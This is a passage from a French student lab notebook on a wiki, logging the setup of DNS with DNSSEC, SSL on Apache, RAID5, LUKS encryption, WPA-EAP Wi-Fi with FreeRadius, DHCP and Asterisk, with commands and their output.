        file &amp;quot;/etc/bind/db.speedflash.space&amp;quot;;&lt;br /&gt;
        allow-transfer {217.70.177.40;};&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
217.70.177.40 est l'adresse IP du serveur DNS de Gandi (ns6.gandi.net) que nous avons pris pour serveur esclave.&amp;lt;br /&amp;gt;&lt;br /&gt;
db.speedflash.space:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for local loopback interface&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.speedflash.space. root.speedflash.space (&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
        IN      NS      ns.speedflash.space.&lt;br /&gt;
ns      IN      A       193.48.57.165&lt;br /&gt;
www     IN      A       193.48.57.165&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous déclarons que notre DNS (ns) est à l'adresse 193.48.57.165, soit l'IP de notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, pour faire fonctionner le tout, on relance bind : &amp;lt;pre&amp;gt; service bind9 restart &amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Et à l'aide du fichier de log daemon.log, on peut confirmer que bind s'est lancé sans erreur :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;tail /var/log/daemon.log | grep named&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: command channel listening on ::1#953&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: journal file is out of date: removing journal file&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: loaded serial 3&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 0.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone speedflash.space/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 127.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 255.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone localhost/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: all zones loaded&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: running&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Securisation de site par SSL=====&lt;br /&gt;
Afin d'obtenir un certificat SSL par Gandi, nous avons besoin d'un CSR. Nous générons donc le CSR par la commande :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous fournissons ce CSR à Gandi, puis nous attendons d'avoir notre certificat. Une fois le certificat obtenu, on peut copier les bons fichiers dans SSL :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# cp certificat.crt /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
root@Flash:/etc/bind# cp serveur.key /etc/ssl/private/speedflash.space.key&lt;br /&gt;
root@Flash:/etc/bind# cp GandiStandardSSLCA.pem /etc/ssl/certs/GandiStandardSSLCA.pem&amp;lt;/pre&amp;gt;&lt;br /&gt;
GandiStandardSSLCA.pem est un certificat intermédiaire afin de certifier notre certificat.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous re-hashons toute la structure afin de prendre en compte notre certificat :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Flash:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
Doing /etc/ssl/certs&lt;br /&gt;
speedflash.space.crt =&amp;gt; ac112f31.0&lt;br /&gt;
speedflash.space.crt =&amp;gt; a88e5e47.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 0cad7ee9.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 3a57595e.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; 816e77e4.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; de4674a3.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''000-speedflash.space-ssl.conf''' afin d'associer APACHE et notre nom de serveur : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;#NameVirtualHost *:443&lt;br /&gt;
        &amp;lt;VirtualHost 193.48.57.165:443&amp;gt;&lt;br /&gt;
                ServerName www.speedflash.space&lt;br /&gt;
                ServerAlias speedflash.space&lt;br /&gt;
                DocumentRoot /var/www/www.speedflash.space/&lt;br /&gt;
                CustomLog /var/log/apache2/secure_acces.log combined&lt;br /&gt;
&lt;br /&gt;
                SSLEngine on&lt;br /&gt;
                SSLCertificateFile /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
                SSLCertificateKeyFile /etc/ssl/private/speedflash.space.key&lt;br /&gt;
                SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA.pem&lt;br /&gt;
                SSLVerifyClient None&lt;br /&gt;
        &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
        &amp;lt;Directory /var/www/www.speedflash.space&amp;gt;&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
ServerName &amp;quot;speedflash.space&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''ports.conf''' du serveur Apache pour qu'il écoute le port 443 (SSL):&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Listen 80 443&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_ssl.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
        #NameVirtualHost *:443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut activer le module SSL de Apache : &amp;lt;pre&amp;gt; a2enmod ssl&amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc activer notre Apache avec notre certificat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# a2ensite 000-speedflash.space-ssl.conf &lt;br /&gt;
Enabling site 000-speedflash.space-ssl.&lt;br /&gt;
root@Flash:/etc/bind# service apache2 reload&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons vérifier que le site est sécurisé en allant sur https://www.speedflash.space et en voyant le cadenas vert.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:SSLSite.png]]&lt;br /&gt;
&lt;br /&gt;
=====Securisation de DNS par DNSSEC=====&lt;br /&gt;
Il faut générer les clés .key et .private afin de pouvoir signer les zones et les enregistrements.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
l'option -r /dev/urandom est ici pour accélérer la génération des clés &amp;lt;br /&amp;gt;&lt;br /&gt;
Nous incluons les clés dans le fichier de zone db.speedflash.space : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/speedflash.space.dnssec/speedflash.space-ksk.key&lt;br /&gt;
$include /etc/bind/speedflash.space.dnssec/speedflash.space-zsk.key&amp;lt;/pre&amp;gt;&lt;br /&gt;
On signe donc la zone : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind/speedflash.space.dnssec# dnssec-signzone -o speedflash.space -k speedflash.space-ksk ../db.speedflash.space speedflash.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.speedflash.space.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
On ajoute le DNSSEC à Gandi : &amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:Dns-gandi.png]]&amp;lt;br /&amp;gt;&lt;br /&gt;
On vérifie que notre DNS est bien sécurisé en essayant la commande : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# dig DNSKEY speedflash.space @localhost&lt;br /&gt;
&lt;br /&gt;
; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY speedflash.space @localhost&lt;br /&gt;
;; global options: +cmd&lt;br /&gt;
;; Got answer:&lt;br /&gt;
;; -&amp;gt;&amp;gt;HEADER&amp;lt;;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
&lt;br /&gt;
;; OPT PSEUDOSECTION:&lt;br /&gt;
; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
;; QUESTION SECTION:&lt;br /&gt;
;speedflash.space.        IN    DNSKEY&lt;br /&gt;
&lt;br /&gt;
;; ANSWER SECTION:&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    257 3 5 AwEAAaJcjim9pdD8U6InsiCNFzJthDwsiwGgPylxRp5nDuoaGrcDp1LU psBv0iY0VUqzcC+uRhTTfjl6P3yuPsnZYefVlSEeRpn9QR33Hioadbhc aFSuYnfwS/L/R6Kwt2XFz5V/fI/j+M2AtGxhBFgVKtmjvnwEr2VfdkFl d9AZJQu09ajWCJIKeL2dRE5bPbXwkDilgkQkBZUVWtXN7qwnrFnlszpb gSdRKosfhScAUmTerxOV6WybzOYb+9D0r8QrDoIhhCpf1/gczAUzHPWd hb0rxIGHk6seMp1qTotZE3SgxrCwm7H6z4pcXeMfbdNzkrIgcJmum9i0 zsLzlghkAPM=&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    256 3 5 AwEAAcHrx5vtsGzY7LF32x3HRIXRwOBm3WZM02NHY4s0uB2djn6tV52B ss78iXC4O5hdpJ0uOxS0/MNCYNJkIXnWsvAHc6lbdWfQ8Jvnj/aBMz94 agXbxXkseqjlIcF1huspBAi9lcY5hsy59MDek5iNlduy8HK6AVItqeQi HviShcq3&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remarque bien la présence de DNSKEY qui nous assure que notre DNS est sécurisé.&amp;lt;br /&amp;gt;&lt;br /&gt;
====Travail réalisé la 7e séance====&lt;br /&gt;
=====Création du RAID5=====&lt;br /&gt;
On ajoute premièrement les partitions à la définition de la machine virtuelle:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;'phy:/dev/virtual/RedFlash,xvdb,w',&lt;br /&gt;
'phy:/dev/virtual/BlackFlash,xvdc,w',&lt;br /&gt;
'phy:/dev/virtual/ReverseFlash,xvdd,w'&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, on crée le RAID5 avec les 3 partitions :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mdadm --create /dev/md0 --level=5 --raid-devices 3 /dev/xvdb /dev/xvdc /dev/xvdd&amp;lt;/pre&amp;gt;&lt;br /&gt;
On vérifie en regardant le fichier de log /proc/mdstat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.0% (692512/1047552) finish=0.1min speed=30109K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===============&amp;gt;.....]  recovery = 78.5% (823084/1047552) finish=0.1min speed=29395K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [================&amp;gt;....]  recovery = 84.2% (883700/1047552) finish=0.0min speed=29456K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [=================&amp;gt;...]  recovery = 87.4% (916664/1047552) finish=0.0min speed=29569K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 93.5% (980148/1047552) finish=0.0min speed=30182K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 96.6% (1012980/1047552) finish=0.0min speed=30267K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 98.1% (1029332/1047552) finish=0.0min speed=30794K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 99.5% (1043028/1047552) finish=0.0min speed=30260K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# [ 1462.872022] md: md0: recovery done.&lt;br /&gt;
cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, on affecte un système de fichier à notre nouveau RAID sur /dev/md0, et on le monte dans /mnt: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# mkfs /dev/md0&lt;br /&gt;
mke2fs 1.42.12 (29-Aug-2014)&lt;br /&gt;
Creating filesystem with 523776 4k blocks and 131072 inodes&lt;br /&gt;
Filesystem UUID: ca2b4bcd-57d3-4f12-bc49-0f7f9cb312b6&lt;br /&gt;
Superblock backups stored on blocks:&lt;br /&gt;
	32768, 98304, 163840, 229376, 294912&lt;br /&gt;
&lt;br /&gt;
Allocating group tables: done&lt;br /&gt;
Writing inode tables: done&lt;br /&gt;
Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
root@Flash:~# mount /dev/md0 /mnt&lt;br /&gt;
[ 1486.818679] EXT4-fs (md0): mounting ext2 file system using the ext4 subsystem&lt;br /&gt;
[ 1486.878898] EXT4-fs (md0): mounted filesystem without journal. Opts: (null)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Cryptage de données=====&lt;br /&gt;
Pour crypter les données, on installe GParted et cryptsetup. Sur la SD, il ne doit y avoir qu'une seule partition. C'est ce qu'on fait grâce à GParted.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, on commence le cryptage des données sur la carte SD: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/mmcblk1p1 &lt;br /&gt;
&lt;br /&gt;
WARNING!&lt;br /&gt;
========&lt;br /&gt;
Cette action écrasera définitivement les données sur /dev/mmcblk1p1.&lt;br /&gt;
&lt;br /&gt;
Are you sure? (Type uppercase yes): YES&lt;br /&gt;
Saisissez la phrase secrète : ***************&lt;br /&gt;
Vérifiez la phrase secrète : ***************&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on ouvre le volume crypté et on crée un système de fichiers avec le dossier home/ :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# cryptsetup luksOpen /dev/mmcblk1p1 home&lt;br /&gt;
Saisissez la phrase secrète pour /dev/mmcblk1p1 : &lt;br /&gt;
root@Rason:/home/pifou# mkfs.ext4 /dev/mapper/home&lt;br /&gt;
mke2fs 1.42.12 (29-Aug-2014)&lt;br /&gt;
En train de créer un système de fichiers avec 3777792 4k blocs et 944704 i-noeuds.&lt;br /&gt;
UUID de système de fichiers=2c54cece-155f-44ed-b4a5-96b9429e7879&lt;br /&gt;
Superblocs de secours stockés sur les blocs : &lt;br /&gt;
	32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208&lt;br /&gt;
&lt;br /&gt;
Allocation des tables de groupe : complété                        &lt;br /&gt;
Écriture des tables d'i-noeuds : complété                        &lt;br /&gt;
Création du journal (32768 blocs) : complété&lt;br /&gt;
Écriture des superblocs et de l'information de comptabilité du système de&lt;br /&gt;
fichiers : complété&amp;lt;/pre&amp;gt;&lt;br /&gt;
On monte la partition : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# mount -t ext4 /dev/mapper/home /mnt/&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous avons écrit dans la carte SD, et nous avons démonté la partition et fermé la partition crypté: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Rason:/# umount /mnt&lt;br /&gt;
root@Rason:/# cryptsetup luksClose home&amp;lt;/pre&amp;gt;&lt;br /&gt;
====Travail réalisé la 8e séance====&lt;br /&gt;
=====Modification routeur pour prise en charge Wifi=====&lt;br /&gt;
Nous avons du modifier la configuration de notre routeur afin de prendre en compte notre borne Wifi. Nous avons donc rajouté le BDI1 avec comme adresse de routeur 10.60.1.1. &amp;lt;br /&amp;gt;&lt;br /&gt;
Ce BDI est un peu spécial, dans la mesure où il doit pouvoir avoir accès à tous les autres BDI. Les paquets qui y transitent ne doivent donc pas être taggés par le protocole DOT1Q (protocole VLAN). C'est pourquoi, dans notre configuration, nous avons ajouté la ligne '''encapsulation untagged''', pour éviter que les paquets ne soient taggés par le numéro de VLAN.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Sécurisation Wifi par WPA-EAP=====&lt;br /&gt;
Pour cette partie, nous commençons donc à installer un serveur FreeRadius sur notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Dans le fichier '''users''', nous ajoutons notre login et notre mot de passe qui nous serviront à nous connecter à la borne : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; flash Cleartext-Password:=&amp;quot;reverse&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Dans le fichier '''clients.conf''', nous ajoutons la configuration de la borne de la E306 :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; client E306 {&lt;br /&gt;
	ipaddr		= 10.60.1.2&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, on passe à la configuration de la borne Wifi. On se connecte en telnet via '''telnet 10.60.1.2''' : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;aaa authentication login eap_flash group radius_flash&lt;br /&gt;
radius-server host 193.48.57.165 auth-port 1812 acct-port 1813 key kadoc&lt;br /&gt;
aaa group server radius radius_flash&lt;br /&gt;
server 193.48.57.165 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
dot11 ssid SSID_FLASH&lt;br /&gt;
vlan 6&lt;br /&gt;
authentication open eap eap_flash&lt;br /&gt;
authentication network-eap eap_flash&lt;br /&gt;
authentication key-management wpa&lt;br /&gt;
mbssid guest-mode&lt;br /&gt;
&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption vlan 6 mode ciphers aes-ccm tkip&lt;br /&gt;
ssid SSID_FLASH&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.6&lt;br /&gt;
encapsulation dot1Q 6&lt;br /&gt;
no ip route-cache&lt;br /&gt;
bridge-group 6&lt;br /&gt;
bridge-group 6 subscriber-loop-control&lt;br /&gt;
bridge-group 6 spanning-disabled&lt;br /&gt;
bridge-group 6 block-unknown-source&lt;br /&gt;
no bridge-group 6 source-learning&lt;br /&gt;
no bridge-group 6 unicast-flooding &lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.6&lt;br /&gt;
encapsulation dot1Q 6&lt;br /&gt;
bridge-group 6&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons maintenant configurer l'interface wlan0 de notre eeePc pour pouvoir se connecter à la borne. Comme nous n'avons pas encore de serveur DHCP, nous devons la configurer manuellement, en prenant une adresse dans notre VLAN :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
  address 10.60.6.6&lt;br /&gt;
  netmask 255.255.255.0&lt;br /&gt;
  gateway 10.60.6.1&lt;br /&gt;
  wpa-ssid SSID_FLASH&lt;br /&gt;
  wpa-key-mgmt WPA-EAP&lt;br /&gt;
  wpa-identity flash&lt;br /&gt;
  wpa-password reverse&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons lancer notre serveur FreeRadius en mode debug via '''freeradius -X'''. &amp;lt;br /&amp;gt;&lt;br /&gt;
On arrive bien à détecter notre SSID (SSID_FLASH) via un smartphone, et nous arrivons à ping notre eeePc depuis la machine virtuelle .&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# ping 10.60.6.6&lt;br /&gt;
PING 10.60.6.6 (10.60.6.6) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 10.60.6.6: icmp_seq=1 ttl=63 time=8.03 ms&lt;br /&gt;
64 bytes from 10.60.6.6: icmp_seq=2 ttl=63 time=13.2 ms&lt;br /&gt;
64 bytes from 10.60.6.6: icmp_seq=3 ttl=63 time=3.42 ms&amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
====Travail réalisé la 9e séance====&lt;br /&gt;
=====Serveur DHCP=====&lt;br /&gt;
Nous avons installé le paquet '''isc-dhcp-server'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous avons modifié le fichier de configuration du serveur DHCP''' /etc/dhcp/dhcpd.conf''':&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;option domain-name &amp;quot;speedflash.space&amp;quot;;&lt;br /&gt;
option domain-name-servers 193.48.57.165;&lt;br /&gt;
&lt;br /&gt;
subnet 10.60.6.0 netmask 255.255.255.0 {&lt;br /&gt;
      range 10.60.6.10 10.60.6.40;&lt;br /&gt;
      option routers 10.60.6.1;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite modifié le fichier '''/etc/default/isc-dhcp-server''' pour y ajouter wlan0 comme interface à prendre en compte.&lt;br /&gt;
Nous avons redémarré le serveur en lançant '''service isc-dhcp-server restart'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
En se connectant avec un smartphone en DHCP, nous arrivons à avoir une adresse IP (photo à ajouter !!), et nous arrivons à la pinger depuis la machine virtuelle.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# ping 10.60.6.10&lt;br /&gt;
PING 10.60.6.10 (10.60.6.10) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 10.60.6.10: icmp_seq=1 ttl=63 time=81.8 ms&lt;br /&gt;
64 bytes from 10.60.6.10: icmp_seq=2 ttl=63 time=132 ms&lt;br /&gt;
64 bytes from 10.60.6.10: icmp_seq=3 ttl=63 time=69.4 ms&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====PCBX=====&lt;br /&gt;
Nous avons modifiés le fichier sip.conf :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;[general]&lt;br /&gt;
hasvoicemail=yes&lt;br /&gt;
hassip=yes&lt;br /&gt;
hasiax=yes&lt;br /&gt;
callwaiting=yes&lt;br /&gt;
threewaycalling=yes&lt;br /&gt;
callwaitingcallerid=yes&lt;br /&gt;
transfer=yes&lt;br /&gt;
canpark=yes&lt;br /&gt;
cancallforward=yes&lt;br /&gt;
callreturn=yes&lt;br /&gt;
callgroup=1&lt;br /&gt;
pickupgroup=1&lt;br /&gt;
nat=yes&lt;br /&gt;
&lt;br /&gt;
[6001]&lt;br /&gt;
type=friend&lt;br /&gt;
host=dynamic&lt;br /&gt;
dtmfmode=rfc2833&lt;br /&gt;
disallow=all&lt;br /&gt;
allow=ulaw&lt;br /&gt;
fullname=ThomasStephane&lt;br /&gt;
username=trojSmaia&lt;br /&gt;
secret=secret&lt;br /&gt;
context=work&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis, nous avons modifiés le fichier /etc/asterisk/extensions.conf pour ajouter le contexte work à notre PCBX:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;[work]&lt;br /&gt;
exten=&amp;gt;_6XXX,1,Dial(SIP/${EXTEN},20)&lt;br /&gt;
exten =&amp;gt; _6XXX,2,Hangup()&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous n'avons pas encore testé cette solution.&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35897</id>
		<title>Cahier 2016 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35897"/>
				<updated>2016-12-12T10:10:38Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Serveur DHCP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Cahier des charges ==&lt;br /&gt;
=== Présentation du travail ===&lt;br /&gt;
&lt;br /&gt;
==== Répartition du travail ====&lt;br /&gt;
&lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 1 (03/10)&lt;br /&gt;
 | Recherche sur le routeur 4331. Installation de la machine virtuelle, définition de l'architecture réseau. &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 2 (10/10)&lt;br /&gt;
